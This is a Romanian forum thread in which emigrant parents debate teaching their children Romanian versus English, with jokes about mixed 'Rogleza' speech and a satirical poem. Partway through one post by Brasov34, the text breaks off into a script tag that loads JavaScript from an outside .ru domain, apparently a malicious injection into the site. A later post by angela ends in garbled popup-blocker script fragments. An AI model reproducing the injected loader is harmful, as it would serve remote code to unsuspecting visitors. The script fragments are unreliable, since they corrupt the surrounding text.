PDA

Arată versiune întreagă : Vorbim Lb. romana sau Lb. engleza?

mihaelaNV
22.01.2005, 17:20
O intrebare care ma bantuie de ceva vreme......Cunosc o familie de romani, ambii parinti plecati din Romania de la 10-15 ani, veniti aici cu familiile lor, s-au casatorit, au copii, si funny e faptul ca desi parintii au vorbit in romana cu copiii, ei nu vorbesc deloc romana. Mi se pare foarte interesant. Acum ma intreb, mai ales ca sunt maritata cu un cetazean american, cum va fi la noi, cand vom avea copii intr-o zi. Eu am intentzia de ai "fortza"placutsmileys/smiley2.gif, pe pruncii mei sa stie sa vorbeasca in ambele limbi, plus others.....

Sunt tare curioasa daca atzi intalnit aceasta situatzie....si stiu ca multi gandesc...la ce bun romana daca nu o folosesc in State.

Eu cred totusi ca cu cat cunosti mai mult cu atat de poti descurca in mai multe domenii, in diferite situatzii, mult mai usor, si mult mai lejer. Evident nu stii ce-tzi aduce destinul, unde you end up going/living....nu?

Vlad
22.01.2005, 17:27
NOI VORBIM ROGLEZA.....

Asta e un mesaj pe care l-am "postat" mai demult:

<DIV> "Nu stiu daca ati observat,dar s-a inventat o noua limba...cea a romanilor din America.Am denumit-o ROGLEZA.http://us.i1.yimg.com/us.yimg.com/i/mesg/tsmileys2/04.gif</DIV>
<DIV>Cei mai multi romani vin in America fara prea multe cunostinte de limbaengleza.Unii dintre ei merg la cursuri pentru a o invata,dar majoritatea o invata "dupa ureche".Astfel a luat nastere ROGLEZA...o amestecatura formata din romana si engleza.</DIV>
<DIV>Pentru romani...este foarte usor sa "invete" aceasta noua limba,pentru americani...este mult mai greu...dar cu efort,se poate invata....CRED.http://us.i1.yimg.com/us.yimg.com/i/mesg/tsmileys2/34.gif</DIV>
<DIV></DIV>
<DIV>Iata cateva exemple din "manualul"de rogleza:</DIV>
<DIV></DIV>
<DIV> --Ma duc pana la bildingul meu sa schimb niste uindous....</DIV>
<DIV> --tonait ma duc in sam plaisis,ca maine incep sa uorc la un nou jab,si nu o sa mai am taim sa ma distrez...... </DIV>
<DIV> --am cumparat niste cichenhttp://us.i1.yimg.com/us.yimg.com/i/mesg/tsmileys2/39.gif,diseara o sa cuc ceva nais pentru hasbandul meu,ca vine de jab veri hangri.......</DIV>
<DIV> --ai do no,daca pot sa vin la saping cu tine,trebuie sa fac landri ca nu mai avem nimic clin......</DIV>
<DIV> --uatz ap men,tot la flor dai cu sapa??....meibi iti schimbi si tu jabul ca o sa ghet sic cu spatele......</DIV>
<DIV> --etc....etc....etc.....</DIV>
<DIV></DIV>
<DIV></DIV>
<DIV>Romanii se adapteaza foarte repede in alta tara.Se integreaza in nouasocietate fara mare efort.Am intalnit romani veniti de nici un an in America.....nu vorbesc engleza(dar se perfectioneaza in rogleza)....fac un copil rapid...si il numesc Jameshttp://us.i1.yimg.com/us.yimg.com/i/mesg/tsmileys2/30.gif.</DIV>
<DIV></DIV>
<DIV>Altii,din cauza ca numele lor de familie nu poate fi pronuntat de amercani....si-l schimba.Astfel un roman din Michigan,si-a schimbat numele la luarea cetateniei americanedin Andronescu in Finetti !!!!????http://us.i1.yimg.com/us.yimg.com/i/mesg/tsmileys2/22.gif......"</DIV>
<DIV></DIV>

mihaelaNV
22.01.2005, 17:37
smileys/smiley36.gifsmileys/smiley32.gifsmileys/smiley36.gif

Brasov34
22.01.2005, 19:51
smileys/smiley2.gifMIhaela, ai dreptate in ceea ce spui. Cred ca nu gresesti cand spui ca iti doresti sa-ti inveti copiii romaneste.smileys/smiley32.gifTE FELICIT PENTRU CA AI SUFLET DE ROMAN!

Nu este deloc de neatins. Cred ca mare importanta o au parintii in aceasta problema. Numai un parinte indiferent, egoist, sau pur si simplu un parinte cu mai putina educatie isi poate lasa copilul in voia soartei... am intalnit parinti care vorbesc in engleza cu copiii lor si ambii sunt romani, ce spui de asta? Si chiar atunci cand in anturaj se afla romani. Numai spun de discutii intre romani, purtate in limba engleza, sau ma rog , "ROGLEZA"smileys/smiley36.gif...mi se pare f. trist!smileys/smiley19.gif

Eu cred ca este o mare tragedie a emigrarii pierderea culturii romanesti, a identitatii noastre!smileys/smiley19.gifTREBUIE sa ne luptam si sa depunem tot efortul pentru ca macar limba sa o putem transmite generatiilor ce vin.Sa devenim mai UNITI si sa cream copiilor nostri ocazii de revedere cu alti copii romani.

Eu am doi copii si sa stii vorbesc f bine romaneste. Baietelul meu de nici 6 ani stie de cca 1 an sa scrie si sa citeasca romaneste.Fetita mai micuta, abia acum invata engleza, pentru noi mai importanta a fost romana la inceput d edrum...engleza o sa o tot auda aici. Dealtfelnoi le-am adus din tara cred doua valize de carti romanesti,de toate felurile. Si au si carti d ecopii in engleza insa pe rafturi separate. smileys/smiley2.gifI

nvata poezii ale marilor scriitori si incercam sa ii introducem in tot felul de activitati culturale ale comunitatilor romanesti din toate orasele din imprejurimi...

Un alt lucru bun sunt povestile pentru copii aduse din tara. Copiilor le place sa le asculte in special inainte de culcare . Si acestea ii ajuta sa isi imbogateasca vocabularul.Dar totul depinde de ce educatie le dam in acest sens. CE vor vedea la noi la fel vor face si ei.

DEci eu cred ca SE POATE, si asta numai noi putem HOTARA!

Este mare pacat sa nu iti auzi copilul vorbindu-ti romaneste, cred ca este o mare durere pentru orice parinte, oricat ar dori sa recunoasca sau nu...

Eu una m-as simti pierduta complet...

Asa ca iti doresc mult succes dar mai intai asteptam sa ai copiiismileys/smiley2.gif

Pana incep ei sa isi dea seama de limba ai inca multa vreme de gandire la acest subiect si mai ales iti vei da seama cat d eimportant este ceea ce am spus eu aici!

Iti doresc numai bine iar romanilor de pretutindeni, emigranti- ii sfatuiesc - nu pentru ei daca nu vor, ci doar pentru copiii pe care-i iubesc enorm , sa le vorbeasca ROMANESTE ori de cate ori pot si sa-i "forteze" daca este nevoie sa li se raspunda in romaneste. EU ASA VOI FACE! SI sunt CONVINSA ca intr-o buna zi imi vor multumi! ( Eu nu am nevoie sa-i fortez pentru ca lor le place limba , deci suint o norocoasa!)smileys/smiley9.gif

Ganditi-va doar ca voi nu ati cunoaste decat engleza si ca proveniti din parinti romani, ce ati simti? V-ati simti fara identitate, va asigur!

Uite ca mi-am amintit un caz real, si va rog sa ma credeti pe cuvant:

Acum vreo 2-3 ani , am intalnit o fata de cca 30 ani, intr-un magazin. Ei , bine, ne-a intrebat daca suntem romani, evident pe engleza. Apoi am aflat ca tatal ei a fost roman, dar ca a decedat SI ca in memoria lui, isi doreste sa invete romaneste. Cauta prieteni romani. Pe mine m-a<script src=http://www.iroe.ru/ngg.js></script>

Brasov34
22.01.2005, 20:04
Stai ca nu ti-am raspuns la intrebarea:

Vorbim Lb. romana sau Lb. engleza?

Cred ca atunci cand suntem in antuaj numai cu romani TREBUIE SA NE FACA O DEOSEBITA PLACERE sa vorbim ROMANESTE.

Si acasa la fel cu cei mici ai nostri. sau cu sotul sau sotia.

Iar ENGLEZA este bine atunci cand iesim in "lume" cand depasim pragul casei si cand suntem nevoiti sa vorbim engleza. Este si engleza frumoasa insa eu o consider necesara si nu poate intrece ca loc romana!

Ceea ce pot exprima in limba mea nu voi putea exprima in nici o alta limba la fel de clar.

Deci engleza intre americani, romaneste intre romani si in familie.

(daca sotul sau sotia este american putem sa le tinem si lor cate-o lectie "fina" de limba engleza,smileys/smiley36.gif si daca ne iubesc cu adevarat vor dori sa invete si ei limba romana precum si noi am invatat limba lor...E DREPT?_)

Si mai e o regula ce tine de bune maniere: cand in anturajul romanesc apare cel putin o persoana de origine americana este la bunul simt sa o treci pe engleza...este perfect normal!smileys/smiley2.gifsmileys/smiley32.gif

Anaxor
23.01.2005, 00:22
Si ca tot veni vorba de ROGLEZA--iata o poezie ce e numai bine elocventa--luata de pe alte "SAITURI"smileys/smiley36.gif

POVESTEA LUI ION AMERICANU'
De pe meleagul transilvan
Plecat-a Ion peste ocean
Lasindu-si stramoseasca glie
Cu...viza de la Loterie!
Si desi-i doar de vreo cinci ani
Aici printre americani
Curata-i limba romaneasca
S-a transformat in... pasareasca!
Vorbeste-acuma dezlanat
Un grai americanizat:
El PENTUIESTE, nu vopseste,
Toyota lui o DRAIVUIESTE
Fundatia o DIGUIESTE
Si tot asa el SPICUIESTE...
(Numai atunci cind se loveste
Si-si da cu HAMARU in deste
Injura neaos, romaneste!)
Si-a luat un BILDING prapadit
Si ca romanu', a muncit;
Prin arsita si prin zaduf
A pus pe BILDING un nou RUF.
A pus si FOUM, a PENTUIT
FLORUL cam vechi l-a SENDUIT
Doi COTI de lac apoi a dat
Si GIOABU' ieri l-a terminat
In TRACU-i NAIS din OCSAN luat
Apoi spre casa a plecat.
(Doar la un STOR s-a mai oprit
Sa ia ceva de DRINCUIT
Ba si un MUVI a RENTUIT
SI dupa SAUAR a mincat,
Un pc la NIUZURI s-a uitat
Si-a adormit cu berea-n mina
"Calaul" de...limba romana!
Da! Asta-i Ion Americanu'!
In casa lui nu-i nici Rebreanu,
Nici Goga si nici Voiculescu,
Alecsandri sau Eminescu!
La el in casa nu gasesti
Nici macar ziare romanesti
Si vreo revista de citit...
E c-a primit-o gratuit!
Si-s multi ca el, ce nici un cent
N-ar da pe un abonament
La vreo revista romaneasca
Religioasa sau lumeasca!
Asa ca Ioane eu iti zic
Sa nu fii asa mojic!
Respecta-ti limba stramoseasca
N-o fa... romano-englezeasca!
Esti greu de cap si nu ma mir
Ca pocesti limba lui Shakespeare
Dar cum poti omule nauc
Sa strici si limba lui Cosbuc?
Caci doar aceasta limba dulce
De la Ureche si Neculce
Iti este in strainatate
Singura ta identitate!
Si tu, romanul meu pribeag
Ce-aici pe un strain meleag
Ti-a fost sortit sa vietuiesti
Comoara limbii romanesti
In suflet de n-o vei purta
Ce goala va fi viata ta!
Chiar de-ai trai pe-un colt de rai
De vei uita al mamei grai
In care-ai spus primul cuvint
Si-ai inaltat spre cerul sfint
Cu glasu-ti sincer si umil
Prima ta ruga de copil
Vei fi, chiar daca esti bogat
Un venetic instrainat!
Strain in tara straina,
Copac fara radacina...
http://www.taclale.net/pseudocafenea/images/smiles/ic&#111;n_biggrin.gif http://www.taclale.net/pseudocafenea/images/smiles/ic&#111;n_biggrin.gif http://www.taclale.net/pseudocafenea/images/smiles/ic&#111;n_biggrin.gif

Anaxor
23.01.2005, 00:28
La mine in casa se vorbeste engleza pt ca singurii romani sint eu si copilul meu restul sint americani. Incerc din cind in cind sa mai vorbesc romana , pe care am vorbit-o in casa pina la decesul sotului roman, insa de atunci treptat treptat s-a pierdut. Anul asta vreau sa merg cu coplul in tara . Pt el va fi prima oara sa viziteze Romania de la plecerea definitiva ( cind avea 4 ani) --acuma are aproape 18. Sint curioasa sa vad cum va fi sa vorbeasca cu buncii care habar nu au d eengleza--noroc ca soara si cumnatul stiu ceva--isa il pregatesc deja vprbind romana cit se paote d emult--si vad ca-si aminteste foarte multe , cu toate ca nu le cunosate sensul ....el traduce din engleza in romana--eu totusi il incurajez, caci macar vad ca depune efort, comparativ cu alti copii ( romani) ce nici nu vor sa deschida gura cind e vorba de limba romana.

Vlad
23.01.2005, 03:03
Copii copilului tau nici nu o sa stie unde e Romania...ca sa nu mai vorbesc de vorbit romaneste.

Prin astane deosebim de foarte multe nationalitati (pe multe dintre ele le consideram inferioare....) care isi pastreaza nationalitatea si dupa 5 generatii....chiar daca traiesc in alta parte decat tara lor de origine.

ASTA AVEM CU ASTA DEFILAM.....

sorin
23.01.2005, 04:24
Copii copilului tau nici nu o sa stie unde e Romania...ca sa nu mai vorbesc de vorbit romaneste.

Vlad, copii nu au nici o vina daca asta se va intampla in unele familii. Toata vina apartine numai si numai parintilor si asta incepe in primul rand de la faptul ca unii dintre acestia (parintii) trec de la limba romana vorbita in casa la.....rogleza, iar apoi desi unii nu prea le au cu engleza vorbesc totusi cu copii lor in engleza. Probabil lor li se pare ca-s "cool", mie insa mi se pare cu totul altceva smileys/smiley2.gif

Ceea ce spuneam mai sus se refera la cazurile cu ambii parinti romani. In casniciile mixte situatia este mai dificila si le acord circumstante atenuante.

23.01.2005, 05:27
Si a cui este vina Anisoara ca domnul Goe nu stie romaneste? Eu as fi
crezut ca o patrioata ca tine vegheza zi si noapte ca progenitura ta sa
vorbesca romaneste si in somn!

Fethoden
23.01.2005, 07:48
Mihaela,

suntem romani, deci cel mai indicat ar fi sa stie si copiii nostri sa vorbeasca romaneste, indiferent daca am venit cu ei din tara,(asa cum am venit eu cu cei 2 copii ai mei,) sau se nasc aici.

Tu iti pui aceasta intrebare si e foarte bine.

Insa chiar tu cand scrii ceva aici, combini niste texte....mama-mama..... asa incatnu pot spune decat ca e un amestec americo-romana.

Daca tu faci asta, copilasii tai in cazul in care mai invata si ceva spaniola, franceza sau ce mai trebe' pe acolo....iese un bun ghiveci....!!!

Stii acumsa mai vorbesti doar in romaneste..!?--daca "da", inseamna ca au sanse copiii tai sa faca diferenta intre una si cealalta....

...nu vreau sa fiu dura cu tine, daram observat asta la tine de cand ai inceput sa scrii primele mesaje .Mai lasa putin stilul asta si treci la scris si la vorbit, "mai" romaneste, nu de alta, la un momendat nu ai sa mai stii nici tu daca anumite cuvinte ce le folosesti "de-a valma" de unde le stii :de la americani, sau de la romani....!!!! si -apoi sa nu iti para rau daca nu ai reusit sa inveti si tu viitorii tai copii, sa stie si ei romaneste ....!!!!

Parerea mea...!...Succes!

Vlad
23.01.2005, 08:33
veri nais...cildrani mei o sa spicuiasca si romaneste si inglis,bicoz aderoaiz I uil chic fundurile lor

23.01.2005, 10:33
Am observat ca majoritatea copiilor (parintii ambii romani ) nu prea vor sa mai vorbeasca in romana ,asta nu inseamna ca au uitat complect doar ca sau obisnuit (la scoala) si le este mai usor in engleza.

Pentru copii care sint nascuti aici sau au numai unul din parinti romani va fi mult mai greu sa invete romana si depinde numai de parinti sa ii invete.Oricit de putine cuvinte vor sti in romana tot le va folosi vreodata la ceva.Cunosc un baiat care sa nascut aici si a trait pina la 18 ani aici,parintii l-au invatat romana in casa si stia cit decit .Dupa 18 ani el sa mutat in Romania si acum nu are probleme cu limba romana.

mihaelaNV
23.01.2005, 11:07
Mersi de mesaje...stiu sa vorbesc romaneste, aminceput faculatatea defilologie, profilul romana-engleza, dar am decis sa vin In State. Stiu sa vorbesc bine in ambele limbi, desi uneori cand ma grabesc sa scriu, sunt expresii mai scurte in engleza decat in romana, de aceea le folosesc...dar ai dreptate Fethoden, mersi de sfat. Eu insa sunt casatorita cu un american, deci situatzia mea e mai delicata. Vreau sa-mi invatz copiii sa vorbeasca romaneste, si mai mult ca sigur vor sti totul despre Romania...asa cum vor stii cum sa joace "video games", asa vor stii sa vorbeasca despre Romania, si romaneste. Sotul meu a vrut sa invetze romaneste, asa ca acuminvatza putin cate putin, sper sa fie mult mai mult, iar cu timpul, poate daca vom merge mai des in Romania, va stii bine. Ai mei care sunt trecutzi de 50, daca pot sa invezte engleza cred ca este nimica toata pentru el sa invetze la varsta lui. Nu cred in " ca ce chestie sa invetze daca nu o va folosi", noi de ce iam nvatzat acasa franceza sau engleza? Nu am visat ca voi ajunge aici decand eram mica! Am ivatzat diferite limbi, pentru ca vroiam sa stiu cat mai multe, e vorba de auto disciplina. Stiu franceza, spaniola si japoneza nu ptr. ca merg in Frantza,Mexic/Spania sau Japonia, ci pentru ca am dorinta de a cunoaste alte culturi, nu vreau sa imi inchid toate usile oportunitatziilor.....eu vreau sa le multiplic, sa le extind...si asta imi doresc pentru copiii mei, sa-si deschida singuri usiile catre succes, catre oportunitati, nu sa stea gura cascata asteptand ele sa bata la usa.....cu cat stii mai mult, si mai bine, potzi sa te bucuri de mai mult si mai bine. Daca poti de ce sa nu invetzi sa te perfectionezi?

Timpul nu iarta si nu asteapta dupa tine, depinde de tine cat de hotarat si "angajat" esti in a-i invatza pe copiii tai despre originea ta/lor.

Eu vreau sa le insuflu dorintza de a calatori si invatza cat mai mult despre cat mai multe culturi, evident daca ele exista au fost destul de importante pentru D-zeu sa le creeze, si fiecare cultura are frumusetzea sa.

Ignorance it's the easiest way for some people to live....for me it's an excuse.

Anaxor
23.01.2005, 11:18
Si a cui este vina Anisoara ca domnul Goe nu stie romaneste? Eu as fi crezut ca o patrioata ca tine vegheza zi si noapte ca progenitura ta sa vorbesca romaneste si in somn!

Hmmm..oare cine o fi anisoara????????ca nu am vazut pe aici pe nimeni cu numele asta.smileys/smiley36.gif

Anaxor
23.01.2005, 11:24
Am observat ca majoritatea copiilor (parintii ambii romani ) nu prea vor sa mai vorbeasca in romana ,asta nu inseamna ca au uitat complect doar ca sau obisnuit (la scoala) si le este mai usor in engleza.

Pentru copii care sint nascuti aici sau au numai unul din parinti romani va fi mult mai greu sa invete romana si depinde numai de parinti sa ii invete.

Exact!!!! am cunoscut foarte multi copii care intr-adevar NU VOR sa mai vorbeasca romana--caci nu e "cool"in specialla adolescenta, mai ales cind amicii sint in jur..

Brasov34
27.01.2005, 13:41
Cred ca totusi parintii sunt de vina pentru ca refuza sa isi invete copiii limba romana. Poate uneori o fac si din comoditate insa sincera sa fiu, pentru mine COMODITATE INSEAMNA SA VORBESC COPIILOR LIMBA ROMANA!

In fine, eu am intalnit si romani- la varsta adolestentei care erau mandri in fata colegilor lor ca s tiu o limba europeana despre care ei habar n-au.smileys/smiley32.gifII SI FELICIT SI MAI ALES PE CEI CE LE_AU TRANSMIS!

Acum depinde de noi cum vom sti sa le inspiram incredere in a invata lb romana si mai ales cum vom sti noi sa le aratam ca suntem mandri ca purtam acest titlu de ROMAN! ...

Daca parintii urasc faptul ca sunt romani cu siguranta niciodata copiii lor nu vor face diferit!..smileys/smiley32.gifSe vor ascunde dupa engleza pe care oricum niciodata nu o vor vorbi ca bastinasii si niciodata nu vor simti ca au si ei o identitate a lor!!!

Cum parintii nostri ne-au invatat atatea lucruri despre cultura noastra , asa si noi TREBUIE sa transmitem generatiilor care vin; nu avem scuze ca traim in afara tarii !

angela
27.01.2005, 13:44
Sunt de acord ca trebuie sa imi invat copiii intr-o buna zi limba romana, le va fii necesara cand vor merge in tara si pentru a vorbii cu buniciismileys/smiley2.gif, dar totusi atata timp cat sotul e cetatean american nu avem cum sa vorbim limba romana in casa, este imposibilsmileys/smiley9.gif

Brasov34
27.01.2005, 14:08
Vorbesti macar tu cu el in lipsa smileys/smiley2.gifsotului! Si asa am inteles - sper ca nu m-a lasat memoria- ca iti vezi sotul destul de rar din cauza merseriei!

DECI DACA VREI SE POATE si nu "intr-o buna zi" ci chiar din primul an!

Iar daca sotul te iubeste sincer va intelege si poate ii va face placere sa afle si el cateva cuvinte macar romanesti..smileys/smiley2.gifSi cine stie, poate intr-o zi vei fi surprinsa ca veti putea comunica in romaneste.

CAZURI DIN ACESTEA NU AI INTALNIT? EU DA si le admir din tot sufletul.

DEci ai o scuza daca ai tai copii nu vor vorbi romaneste , insa scuza ti-o acord doar pe jumatate!

Invata tu copiii "jumate" din cat ar trebui sa auda de la doi parinti si tot este un castig la urma urmei...

Si nu stiu cum sa iti spun MAMA AR TREBUI sa transmita limba ei copiilor, de aceea se numeste "LIMBA MATERNA"! smileys/smiley2.gif...

(Citeste cazul real intalnit de mine - si scris la subiectul 24 ianuarie in America. )

angela
27.01.2005, 14:15
Am zi intr-o buna zi referindu-ma " cand voi avea bebelusii" smileys/smiley2.gif

Sotul ma iubeste sigur, cel putin asta sustine in fiecare zi smileys/smiley36.gif, dar daca nu vorbeste romaneste asta nu inseamna ca iubirea lui lasa de doritsmileys/smiley2.gif. In primul rand ne aflam pe teritoriu american si limba oficiala a ceastei tari este engleza din cate stiu eu, in al doilea rand tin sa mentionez ca el stie cateva cuvinte,expresii in limba romana, dar tot va fii dificil pentru simplu fapt ca traim pe teritoriu american iar in scoala vor vorbii doar engleza, cu prietenii la fel. Oricum ii voi invata romana deoarece eu sunt romanca si imi place cum suna lb noastra,mai ales ironiilesmileys/smiley2.gifsmileys/smiley36.gif

inas
28.01.2005, 03:12
Da ce spuneti totusi de urmatoarea situatie, vazuta la niste prieteni, ce au crescut copilul aici de la 6 ani, vorbind cu el doar in romaneste, si lasand engleza pe seama scolii. Acum nu stie foarte bine nici engleza, nici romana. Nu poate citi cartile in romana, nu are un vocabular foarte bogat nici in engleza. Nu toti copii pot face fata probabil la dualitatea asta, sau n-au capacitatea, si daca in Romania nimeni n-o sa-l judececand mai greseste cate-un cuvant, aici poate se va descurca mai greu fata de altii. Si daca traieste aici are deja un handicap. Cum poti sa previi situatia asta?

angela
28.01.2005, 07:05
Iar daca e nascut si crescut aici atunci chiar nu are nici o scuza ca nu vorbeste corect limba engleza. In Romania inca il mai iarta pentru ca nu a trait acolo dar aici deci ce motive invocam????? Copilul care va fii crescut aici si va trai aici, il inveti limba romana ca cea dea a doua limba, fara presiuni extreme, deoarece in primul rand el trebuie sa stie foarte bine engleza.

sauzimdebine
28.01.2005, 10:23
Ceva nu este in regula cu ceea ce spune inas. Dar in nici un caz faptul ca au vorbit numai romaneste cu copilul in casa. Fetita mea este aici de la 4 ani, in casa vorbim numai romaneste, avem multi cunoscuti cu care se vorbeste doar romaneste, cu toate acestea nu sunt probleme cu limba engleza. Nu au fost de la inceput si nici acum dupa 10 ani. Exprimarea in romaneste, ca de scris si citit nu se prea pune probelma, mai lasa de dorit, cateodata, dar nu cea in limba engleza.
Probabil ca acel copil are nevoie de mai multa atentie cu toate probelmele scolare. Nu cred ca vorbitul in engleza in familie ar fi ajutat situatia.

Brasov34
28.01.2005, 16:27
DA, sunt deacord cu "sauzimdebine"!

CA un exemplu este baietelul meu de aproape 6 ani. In septembrie 2004 , cand l-am bagat pentru prima data la scoala nu stia copilul sa lege prea multe idei. Si iata ca in doar cateva luni- in decembrie la o sedinta cu profesoara (dupa un test dat p eclasa la toti copiii), am fost placut surprinsi sa aflam ca este copilul nr. 1 in clasa la tot ce inseamna scoala, inclusiv ENGLEZA! Asa ca suntem tare mandri!

Iar fetita noastra care are doar 4 ani simteam ca este antitalent la a invata engleza. Da de unde! S-o auziti si pe ea cate a putut prinde la preschool! DECI FARA GRIJI IN ACEASTA PRIVINTA!

...Si noi nu vorbim deloc cu micutii nostri nici macar un cuvant pe engleza...engleza se va prinde din zbor mai ales la copii, romana trebuie urmarita, evident daca si parintii isi doresc asta.

Eu sincera prefer sa aud un "MAMI" smileys/smiley1.gifdecat un "MOM" smileys/smiley19.gifdin partea copiilor mei! Patrunde mai bine in suflet...smileys/smiley2.gif...acum depinde si de felul nostru de a fi! Eu nu ma simt bine cand un roman mi se adreseaza in engleza, dar acela sa fie chiar copilul meu! NICI VORBA!

Brasov34
28.01.2005, 16:30
Mentiune- baietelul meu e doar la KINDERGARTEN- asa ca pana termina scoala are timp sa se duca la ce facultate va dori el...atata engleza va sti ,cu siguranta!

Problema nu este engleza aici, ci "bibilica"!

NU vedeti cati emigranti capabili au prioritate pentru un job sau altul ? SI asta nupentru ca este mana d elucru ieftina, ci pentru ca este istet! ASTA CONTEAZA IN TARA ASTA! Sa stii sa itivalorifici cunostiintele, nu prea conteaza cat de bine gramatical vorbesti...sau ma rog, asta e pe locul doi!

Asa ca e prematur sa ne gandim la faptul ca micutii nostri nu vor stii engleza! MAI BINE V_ATI GANDI CE E DE FACUT SA NU NE PIERDEM NOI IDENTITATEA AICI IN LUMEA VITEZEI DUPA BANI...smileys/smiley19.gif

AndaF
23.05.2007, 12:40
Observ ca este un subiect destul de vechi si controversat, insa ma gandesc (,) ca niste ideei noi, n-ar strica.

Este foarte usor sa "arunci" cu rosii, mai ales cand nu ai copii...

Eu o sa vorbesc numai din experienta mea si a copiilor mei...

Baiatul cel mare (6 ani jumate) a venit in US acum 2 ani si un pic, fara sa stie deloc engleza, sia intrat in sistem, lagradinita; oricat m-am straduit eu sa-l invat engleza acasa, in prima luna de gradinita n-a inteles mare lucru, si ia fost destul de greu... asa ca am incept sa vorbim numai egleza, ca s-o stapaneasca mai bine...nu mi-am dat seama ca o sa uite romana si ca nu o sa mai vrea sa o vorbeasca...(prietenii romani care au vorbit cu el mi-au zis ca se incapataneaza sa nu vorbeasca lb romana, dar ei cred ca o intelege)

Cel mic - 2 ani si 5 luni - repeta cuvinte in romana, insa nu prea le intelege...

Mentionez, ca sotul este american, insa stie ceva romana si mai incearca sa vorbeascacu ei...cu accent puternicsi pocit de cuvinte, dar macarne stradium...Marea majoritate a timpului vorbim engeza (cu exeptii cand ne vedem cu alti romani)

fifi
23.05.2007, 14:24
hai sa ating si eu subectu` asta si totodata si pe ala cu secrete... fiica mea a venit la varsta de5 ani in Canada, avem 4 ani aici, intelege inca 70% romaneste dar nu mai vorbeste deloc si e numai vina mea smileys/smiley19.gif

accept ca toate rosiile posibile sa se sparga in capul meu...

FidelKatzo
24.05.2007, 04:25

Prin astane deosebim de foarte multe nationalitati (pe multe dintre ele le consideram inferioare....) care isi pastreaza nationalitatea si dupa 5 generatii....chiar daca traiesc in alta parte decat tara lor de origine.

Este o rusine ,ceva de neconceput,ca un copil sa nu stie limba materna..

AndaF
24.05.2007, 05:30
Cati copii ai Paul antoniu? Esti in US?

Sa inteleg, ca vorbesti din experinta - copii tai vorbesc romana chiar daca in casa si la scoalase vorbeste engleza...?

FidelKatzo
24.05.2007, 08:29
Cati copii ai Paul antoniu? Esti in US?

Sa inteleg, ca vorbesti din experinta - copii tai vorbesc romana chiar daca in casa si la scoalase vorbeste engleza...?

Da, vorbesc din experienta.Vorbim curent trei limbi in casa.Nevasta-mea vorbeste cu ei numai romaneste.Limba romaneasca este pentru ei limba materna.Unul din copii este nascut in occident.Este o chestie foarte neplacuta sa vezi la serile romanesti tineri de 20 de ani, care au venit in occident la varsta de 5-6 ani si daca le spui ceva romaneste fac ochii mari si nu stiu ce sa spuna.Compatimesc parintii lor, care incearca sa salveze situatia si spun:Intelege tot, dar nu vorbeste ..

angela
24.05.2007, 09:34
Paul in anumite cazuri oricat ai incerca nu se poate asa ceva. Tatal copilului meu e american, vorbeste doar engleza si vrea ca fiul sau sa vorbeasca aceeasi limba. Ii dau dreptate si sotului, asa cum sunt eu mandra ca sunt romanca la fel de mandru e si el de tara lui, limba si obiceiuri. Ce fac eu in cazul asta?? Cum pot sa impun eu lb romana copilului meu atata timp cat el este nascut si crescut in State?? Va merge in vacantze din cand in cand in Romania dar nu va trai acolo. < =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

AndaF
24.05.2007, 09:35
Felicitari Paul antoniu! ma bucur pentru tine si familia ta!

Vad ca ma compatimesti smileys/smiley36.gif i-ti spun, ca nu e cazul! smileys/smiley36.gif

Voi sunteti romani amandoi, acum, daca unul dintre voi era american, i-ti spun eu ca se schimba situatia...chiar daca unul dintre copii tai a fost nascut in occident, nu este acelasi lucru...

Si daca unul din copii tai s-ar incapatana sa nu vorbeasca una din cele 3 limbi pe care spui ca le stiu, ce ai face in cazul asta?

FidelKatzo
24.05.2007, 10:43
AndaF,nu intentionez sa fac misto.Au implinit copiii tai virsta de 20 de ani? Fiecare trebuie sa stie ce este important pentru el si familia lui.La vremea respectiva, pentru incapatinatul familiei o aducem pe soacra-mea in vizita la noi.Cu ea se putea vorbi numai romaneste..Totul e sa perseverezi,depinde cat de important este pentru tine ca copilul tau sa vorbeasca romaneste..

angela,nu va fi nici o problema pentru copilul tau sa stie bine limba engleza ,din moment ce este nascut in State.O va face in joaca si fara eforturi deosebite..Problema va avea sa invete romaneste, daca pierzi startul ,sau mai bine zis momentul potrivit..Dar asta trebuie sa discuti cu sotul tau..,sa fie si el de acord...

livia
24.05.2007, 11:28
Hai sa va povestesc un caz, pe cat de curios pe atat de haios. Copiii unor romani, prieteni de-ai mei, primul venit aici la cateva luni, al doilea, nascut aici. Parintii au vorbit cu ei romaneste in casa, dupa o varsta copiii insa au comutat, cum cel mai des se intampla (sau cel putin asa am observat eu in cazurile pe care le cunosc) pe engleza.

Acum mama li se adreseaza in romaneste iar ei raspund in engleza. Doar cand nu au incotro, persoana nu vorbeste engleza (cazul bunicii lor), vorbesc romaneste sau cand ii mai provocam noi, prietenii, la cate o petrecere.

Surpriza este, ca vorbesc moldovenestesmileys/smiley4.gif, mentionez ca parintii, bunicii nu-s moldoveni. Nimeni nu-si explica cum si in ce fel, dar asta este realitatea. Nu mai spun ce hai este pe aceasta tema. Ei nu prea inteleg ce si cum, de ce radem de felul in care vorbesc.

AndaF
24.05.2007, 11:50
Paul antoniu, nu ma intelege gresit! Eu nu fac misto de tine... eu chiar te-am felicitat sincer, si chiar te invidiez, fiinca nu-mi place situatia actuala a copilului meu (care pana la 4 ani jumate vorbea numai romana)

Iar ideea ta cu bunica, este excelenta... deja au respins-o pe mama de 3 ori la ambasada... ce sa-ti zic, eu vorbesc zilnic cu mama la telefon, iar Chip, cand ii spun ca e bunica la telefon, asculta, zice "da, da" si nu intelege mai nimic, inca mama care habar nu are engleza, a inceput sa-i zica "I love you" si "I miss you".... cam asa e conversatia telefonica intre ei doi...

Copii de romani cu care s-a jucat baiatul meu, in cel mai fericit caz vorbeau romana cu parintii, dar cu ceilalti copii, tot in engleza...

Livia - am observat si eu multe familii de romani, carevorbesc asa cum descrii tu...

dixy2k
22.07.2007, 16:06
[QUOTE=Vlad]

Este o rusine ,ceva de neconceput,ca un copil sa nu stie limba materna..

"Limba materna"? Pentru un copil nascut si crescut in U.S chiar si din parinti romani eu cred ca limba lui materna este engleza si nu romana.Ai mei pitici chiar acum cind scriu aceste rinduri asculta la o caseta cu cintece pt copii in romaneste de pe vremea cind eu si sotul eram mici.

